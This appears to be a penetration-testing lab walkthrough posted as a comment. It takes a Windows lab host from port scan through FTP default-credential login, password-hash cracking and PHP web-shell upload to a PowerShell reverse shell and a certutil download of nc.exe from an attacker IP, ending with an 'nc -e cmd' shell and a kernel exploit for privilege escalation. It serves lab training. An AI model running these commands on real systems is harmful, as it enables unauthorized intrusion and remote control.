WDavid404
commented
3 months ago PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 125 zFTPServer 6.0 build 2011-10-17
242/tcp open http syn-ack ttl 125 Apache httpd 2.2.21 ((Win32) PHP/5.3.8)
3145/tcp open zftp-admin syn-ack ttl 125 zFTPServer admin
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 125
| rdp-ntlm-info:
| Target_Name: LIVDA
| NetBIOS_Domain_Name: LIVDA
| NetBIOS_Computer_Name: LIVDA
| DNS_Domain_Name: LIVDA
| DNS_Computer_Name: LIVDA
| Product_Version: 6.0.6001
|_ System_Time: 2024-07-31T04:13:35+00:00
|_ssl-date: 2024-07-31T04:13:40+00:00; -1s from scanner time.
| ssl-cert: Subject: commonName=LIVDA
| Issuer: commonName=LIVDAsearch exploit info for zftp --> zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal
22/tcp:
Login FTP with anonymouse
-->
Cannot download files due to permisison.
List username on /accounts dir
242/tcp:
--> Try admin:admin --> Failed...
--> Try using account name info to login --> Failed
Try login FTP with acccount name info (Offsec, Admin)
--> Can login with admin:admin
Download all files and confirm the content.
cat .htpasswd
-->
offsec:$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0
crack it
echo '$apr1$oRfRsc/K$UpYpplHDlaemqseM39Ugg0' > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash
--> elite
Login to 242/tcp page with offsec:elite
-->
--> Translate to English: "He who wants to be a nut from a nut breaks the nut!"
ffuf -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt -t 100 -u http://192.168.156.46/FUZZ -H "Authorization: Basic b2Zmc2VjOmVsaXRl"
--> No info
Try rdp login with offsec:elite -->failed
When login FTP with admin:admin, found that we can upload file to FTP!
so, upload a php cmd file
because in FTP, there is "index.php" that is we found after login to 242/tcp.
so for the reverse shell php file, we can access it via IP:242/php_cmd.php?cmd=whoami
--> works!
Use powershell reverse command
....?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.205%27%2C80%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22
--> didn't work.
Try upload nc.exe and then use reverse shell via nc.exe
wget 192.168.45.205/nc64.exe -O C:/windows/temp/nc64.exe
--> didn't work
certutil -urlcache -f http://192.168.45.205/nc.exe c:/users/public/downloads/nc.exe
certutil%20-urlcache%20-f%20http://192.168.45.205/nc.exe%20%20c:/users/public/downloads/nc.exe
c:/users/public/downloads/nc.exe -e cmd 192.168.45.205 4444--> work! (Also tried other dir location but all failed:
- c:/users/public/desktop/ --> access deny
- c:/windows/temp/ --> no response on web browser and didn't work
- nc64.exe didn't work!!! because the target host is x86 system...
- wget is not supportted on the target host.
- powershell is not supportted on the target host. )
PE
systeminfo
--->
Regarding windows kernel exploit, can use https://github.com/SecWiki/windows-kernel-exploits
-->
https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120
put x86.exe to FTP and use it to send nc reverse shell
so we got a reverse shell as admin user
Keypoints: